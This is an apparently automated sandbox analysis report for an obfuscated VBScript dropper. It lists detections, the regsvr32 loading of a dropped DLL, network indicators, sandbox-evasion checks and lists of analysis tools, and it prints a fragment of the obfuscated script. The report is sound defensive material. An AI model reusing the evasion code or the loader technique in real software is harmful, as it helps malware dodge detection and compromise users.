Loading ...

Play interactive tourEdit tour

Analysis Report files#_56117.vbs

Overview

General Information

Sample Name:files#_56117.vbs
MD5:147091e61ec59f67ab598d26f15ad0e7
SHA1:0dd98cc3868b7896b4ebca00e55ec3ce2bdc4118
SHA256:2591ec56069e41c33309c3042083c047c360c62454d52f734a79be21540c2967

Most interesting Screenshot:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Creates processes via WMI
Deletes itself after installation
Machine Learning detection for dropped file
May check the online IP address of the machine
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: Regsvr32 Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Tries to load missing DLLs

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 5048 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\files#_56117.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • regsvr32.exe (PID: 1112 cmdline: regsvr32 -s C:\Users\user\AppData\Local\Temp\Cervantes.pls MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 4116 cmdline: -s C:\Users\user\AppData\Local\Temp\Cervantes.pls MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview


System Summary:

barindex
Sigma detected: Regsvr32 AnomalyShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: -s C:\Users\user\AppData\Local\Temp\Cervantes.pls, CommandLine: -s C:\Users\user\AppData\Local\Temp\Cervantes.pls, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -s C:\Users\user\AppData\Local\Temp\Cervantes.pls, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 1112, ProcessCommandLine: -s C:\Users\user\AppData\Local\Temp\Cervantes.pls, ProcessId: 4116

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\Cervantes.plsAvira: detection malicious, Label: HEUR/AGEN.1046090
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\Cervantes.plsVirustotal: Detection: 48%Perma Link
Source: C:\Users\user\AppData\Local\Temp\Cervantes.plsReversingLabs: Detection: 56%
Multi AV Scanner detection for submitted fileShow sources
Source: files#_56117.vbsVirustotal: Detection: 11%Perma Link
Source: files#_56117.vbsReversingLabs: Detection: 16%
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\Cervantes.plsJoe Sandbox ML: detected

Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior

Networking:

barindex
May check the online IP address of the machineShow sources
Source: unknownDNS query: name: iplogger.org
Source: Joe Sandbox ViewIP Address: 88.99.66.31 88.99.66.31
Source: Joe Sandbox ViewIP Address: 88.99.66.31 88.99.66.31
Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: unknownDNS traffic detected: queries for: iplogger.org
Source: wscript.exe, 00000000.00000003.1113365146.000001F3B191A000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: wscript.exe, 00000000.00000003.1113365146.000001F3B191A000.00000004.00000001.sdmpString found in binary or memory: http://cert.int-x3.letsencrypt.org/0
Source: wscript.exe, 00000000.00000003.1113365146.000001F3B191A000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
Source: wscript.exe, 00000000.00000003.1113365146.000001F3B191A000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: wscript.exe, 00000000.00000003.1113365146.000001F3B191A000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: wscript.exe, 00000000.00000003.1113365146.000001F3B191A000.00000004.00000001.sdmpString found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
Source: wscript.exe, 00000000.00000003.1113365146.000001F3B191A000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
Source: wscript.exe, 00000000.00000002.1131185440.000001F3B5255000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.1131515341.000001F3B53D4000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/
Source: wscript.exe, 00000000.00000002.1131185440.000001F3B5255000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/1
Source: wscript.exe, 00000000.00000003.1113365146.000001F3B191A000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.1131459959.000001F3B52C0000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.1114998047.000001F3B1A49000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.1113737146.000001F3B5274000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.1126487835.000001F3B1A40000.00000004.00000040.sdmpString found in binary or memory: https://iplogger.org/1N3Ei7
Source: wscript.exe, 00000000.00000003.1109748390.000001F3B52C2000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/1N3Ei7s
Source: wscript.exe, 00000000.00000003.1114998047.000001F3B1A49000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/1N3Ei7u
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443

System Summary:

barindex
Source: files#_56117.vbsInitial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: classification engineClassification label: mal100.troj.evad.winVBS@4/6@1/1
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\adobe.urlJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\files#_56117.vbs'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: files#_56117.vbsVirustotal: Detection: 11%
Source: files#_56117.vbsReversingLabs: Detection: 16%
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\files#_56117.vbs'
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\Users\user\AppData\Local\Temp\Cervantes.pls
Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\Cervantes.pls
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\Cervantes.plsJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: Binary string: y:\test4\run4\Debug\run4.pdb source: Cervantes.pls.0.dr

Data Obfuscation:

barindex
VBScript performs obfuscated calls to suspicious functionsShow sources
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.ScriptName, cStr(864872629)) > 0 And eerily804 = 0) ThenExit FunctionEnd IfSet LouisianaService = GetObject("winmgmts:\\.\root\cimv2")Set burbanklItems = LouisianaService.ExecQuery("Select * from Win32_LogicalDisk")For Each LCVPVzmFYoATz In burbanklItems' pont. flag lab granite proper Harcourt rutile dwarves. prospect biscuit depend adjacent farfetched anise gaggle sashay whig whereof lacquer. blocky greensward epistle tagWRLpxzbdZ = tagWRLpxzbdZ + Int(LCVPVzmFYoATz.Size / ((1073742868 - (950 - 2.0)) - (75 + 21.0)))NextIf tagWRLpxzbdZ < ((70 + ((87 - 3.0) + 285.0)) - 379.0) ThenPAnMjKKlKawcyHNEnd If' oriole mendacious perpetuate symmetry curfew, gotten Arlene Segundo hall radioactive revving, Purcell eleventh lenticular End FunctionFunction UWbEE()REM auction saddlebag chamois poi wrath Copenhagen twentyfold cubbyhole earmark hymn hypothermia endomorphism coagulable on error resume nextIf (InStr(WScript.ScriptName, cStr(864872629)) > 0 And eerily804 = 0) ThenExit FunctionEnd Ifcontrolled = Array("catheter newsletter supple plaid indict groggy permissive clang fanfold. 5436813 vivid lumbago abbe maw glissade550 hyphenate smell Ludwig rhythm chevy299 Gonzales sphagnum proprioception Ramo ")Wellesley = (((40 + 6657.0) - 203.0) - (53 + 6438.0))REM aniline crow censure anatomy Berniece fest Cluj787 Acapulco fernery adulate explicable Gustafson cautious appropriate shun FCC basidiomycetes processor. 7120026 Bangor farina officialdom mallow tactful latus Hutchinson vaccinate schooner Cyrus rear lithography adjacent238 groat CERN, 8768946 impart wiZSZrk = (((79 + 15.0) + (-16.0)) + (-(61 + 14.0)))If CreateObject("Scripting.FileSystemObject").GetFolder(LHnoyaVcivO).Files.Count < Wellesley ThenPAnMjKKlKawcyHNEnd IfSet glJpk = CreateObject("WScript.Shell")polite = glJpk.ExpandEnvironmentStrings("%USERPROFILE%") + "\Downloads\"If CreateObject("Scripting.FileSystemObject").GetFolder(polite).Files.Count < wiZSZrk ThenPAnMjKKlKawcyHNEnd IfREM tablespoonful chorus Kobayashi lop gallant brisk varnish. pedagogic success expanse ornament archetype, 9928097 classmate monel Koenigsberg mimicry seasonal Norton contravariant hallmark coexist onetime parentheses Davis. 4942457 pounce525, clomp crook dispensable semantic Scorpio poi573. imprint serum, 4354814 datura Auriga broach Achilles concurrent hormonal concertina, Putnam scathing semantic413 worktable, scion sceptic. were Laredo. cabinetry ' telephotography historian pleural hot occipital bout lord diadem determinacy eminent321 loggerhead Himalaya war amnesty osmium rye Spector rootstock Hitachi pronunciation Barnes safe End FunctionFunction zQrVl()Dim iEveXErawdMlYD: Set iEveXErawdMlYD = CreateObject("Scripting.FileSystemObject")Dim EHQphxSk: Set EHQphxSk = CreateObject("Shell.Application")Shelton = Array("downwind longitudinal pawnshop juke sale grief Albrecht parentage. 1561961 mask hoar Garrisonian chamois253 cloak meridional scrooge furlough tyke awoke Macadamia Perseus boxcar Shaffer pioneer, f
Source: Cervantes.pls.0.drStatic PE information: section name: .textbss

Persistence and Installation Behavior:

barindex
Creates processes via WMIShow sources
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\Cervantes.plsJump to dropped file
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\Cervantes.plsJump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Deletes itself after installationShow sources
Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\files#_56117.vbsJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)Show sources
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmpBinary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmpBinary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmpBinary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmpBinary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmpBinary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmpBinary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmpBinary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmpBinary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmpBinary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmpBinary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmpBinary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmpBinary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmpBinary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000002.1126093818.000001F3B193D000.00000004.00000001.sdmpBinary or memory string: CKER.EXE","SYSANALYZER.EXE","AVZ.EXE","IDAQ.EXE","PROCESSMEMDUMP.EXE","SYSER.EXE","BEHAVIORDUMPER.EXE","IMMUNITYDEBUGGER.EXE","PROCEXP.EXE","SYSTEMEXPLORER.EXE","BINDIFF.EXE","IMPORTREC.EXE","PROCEXP64.EXE","SYSTEMEXPLORERSERVICE.EXE","BTPTRAYICON.EXE","IMUL.EXE","PROC
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmpBinary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmpBinary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmpBinary or memory string: SYSER.EXE=
Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmpBinary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmpBinary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmpBinary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmpBinary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmpBinary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmpBinary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmpBinary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmpBinary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmpBinary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmpBinary or memory string: DUMPCAP.EXE
Source: wscript.exe, 00000000.00000003.1122382392.000001F3B4E10000.00000004.00000001.sdmpBinary or memory string: ESERVER.EXE","MMR.EXE","SAMPLE.EXE","WIRESHARK.EXE","FIDDLER.EXE","MULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")
Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmpBinary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmpBinary or memory string: FORTITRACER.EXEA
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exe TID: 4176Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: wscript.exe, 00000000.00000002.1133257949.000001F3B7D10000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000000.00000003.1109581659.000001F3B53E5000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#P
Source: wscript.exe, 00000000.00000003.1113893693.000001F3B528C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000002.1133257949.000001F3B7D10000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.1133257949.000001F3B7D10000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000003.1114180133.000001F3B53E6000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW@
Source: wscript.exe, 00000000.00000002.1133257949.000001F3B7D10000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: Cervantes.pls.0.drJump to dropped file
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\System32\wscript.exeNetwork Connect: 88.99.66.31 187Jump to behavior

Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\multiplication.zip VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\multiplication.zip VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\multiplication.zip VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\multiplication.zip VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\multiplication.zip VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\multiplication.zip VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\multiplication.zip VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\multiplication.zip VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\multiplication.zip VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmpBinary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmpBinary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmpBinary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmpBinary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmpBinary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmpBinary or memory string: lordpe.exe
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmpBinary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000003.1115525086.000001F3B4379000.00000004.00000001.sdmpBinary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.1114844628.000001F3B437F000.00000004.00000001.sdmpBinary or memory string: regshot.exe

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation221Winlogon Helper DLLProcess Injection11Masquerading1Credential DumpingVirtualization/Sandbox Evasion3Application Deployment SoftwareData from Local SystemData CompressedStandard Cryptographic Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaScripting121Port MonitorsAccessibility FeaturesVirtualization/Sandbox Evasion3Network SniffingSecurity Software Discovery331Remote ServicesData from Removable MediaExfiltration Over Other Network MediumStandard Non-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesExploitation for Client Execution1Accessibility FeaturesPath InterceptionProcess Injection11Input CaptureRemote System Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseScheduled TaskSystem FirmwareDLL Search Order HijackingScripting121Credentials in FilesSystem Network Configuration Discovery1Logon ScriptsInput CaptureData EncryptedMultiband CommunicationSIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessFile Deletion1Account ManipulationFile and Directory Discovery2Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceObfuscated Files or Information1Brute ForceSystem Information Discovery24Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskDLL Side-Loading1Two-Factor Authentication InterceptionNetwork SniffingPass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.